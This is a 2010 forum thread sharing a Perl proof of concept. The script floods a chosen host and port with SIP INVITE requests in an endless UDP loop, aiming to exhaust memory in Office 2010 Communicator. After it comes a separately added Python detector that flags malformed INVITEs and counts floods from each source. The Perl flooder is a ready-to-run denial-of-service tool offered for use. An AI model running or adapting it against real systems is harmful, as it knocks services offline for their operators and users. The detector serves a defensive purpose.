Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit

Discussion in 'Application Software' started by Checkout!, Apr 6, 2010.

  1. Checkout!

    Checkout! MDL Junior Member

    #1 Checkout!, Apr 6, 2010
    Last edited by a moderator: Apr 20, 2017
    Hello,

    Please verify this PoC for Microsoft Office ( 2010 beta ) exploit,

    Code:
    #!/usr/bin/perl
    #######################################################################################################################
    #    Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via    #
    #    a large number of SIP INVITE requests.                                                                           #
    #######################################################################################################################
       
       
    use IO::Socket;
       
    print("\nEnter IP Address of Target Server: \n");
    $vuln_host_ip = <STDIN>;
    print("\nEnter Port of Target Server: \n");
    $port = <STDIN>;
       
    $sock_sip = IO::Socket::INET->new(    PeerAddr => $vuln_host_ip,
                                         PeerPort => $port,
                                         Proto    => 'udp') or die "Unable to create Socket: $!";
    #if the server is configured on TCP replace 'udp' with 'tcp'.
       
    while(1)
    {
    print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
        
    }
       
    #program never comes here for execution
     
    close($sock_sip);
    Thanks!
    -j0
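
As an added example (not part of the original post and not Microsoft code), a defender-side check for the traffic this PoC generates: it flags INVITEs that lack header fields RFC 3261 requires, as the posted message does, and counts INVITEs per source address in a sliding window. The function and class names, the thresholds and the well-formed sample message are assumptions made for illustration.

```python
from collections import defaultdict, deque

# Header fields RFC 3261 section 8.1.1 requires in every SIP request.
REQUIRED = {"via", "to", "from", "call-id", "cseq", "max-forwards"}
# Compact header forms defined by RFC 3261, mapped to their full names.
COMPACT = {"v": "via", "t": "to", "f": "from", "i": "call-id"}
# Message text from the posted PoC: a request line and one Via header only.
POC_INVITE = ("INVITE sip:arpman.malicious.com SIP/2.0\r\n"
              "Via: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n")
# Constructed well-formed INVITE for comparison (example.com / 192.0.2.x values).
GOOD_INVITE = ("INVITE sip:bob@example.com SIP/2.0\r\n"
               "Via: SIP/2.0/UDP 192.0.2.10;branch=z9hG4bK776asdhds\r\n"
               "Max-Forwards: 70\r\nTo: <sip:bob@example.com>\r\n"
               "From: <sip:alice@example.com>;tag=1928301774\r\n"
               "Call-ID: a84b4c76e66710@192.0.2.10\r\nCSeq: 314159 INVITE\r\n\r\n")

def missing_headers(datagram):
    """Return the mandatory headers an INVITE lacks, or None if not an INVITE."""
    lines = datagram.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[0] != "INVITE" or parts[2] != "SIP/2.0":
        return None
    seen = set()
    for line in lines[1:]:
        name, sep, _ = line.partition(":")
        if sep:
            name = name.strip().lower()
            seen.add(COMPACT.get(name, name))
    return REQUIRED - seen

class InviteFloodDetector:
    """Sliding-window count of INVITEs per source address."""
    def __init__(self, max_invites=20, window=1.0):  # assumed thresholds
        self.max_invites, self.window = max_invites, window
        self.seen = defaultdict(deque)

    def observe(self, src, ts, datagram):
        """Return alert names for one datagram received from src at time ts."""
        missing = missing_headers(datagram)
        if missing is None:
            return []
        alerts = ["malformed-invite"] if missing else []
        q = self.seen[src]
        q.append(ts)
        while ts - q[0] > self.window:  # drop timestamps older than the window
            q.popleft()
        if len(q) > self.max_invites:
            alerts.append("invite-flood")
        return alerts
```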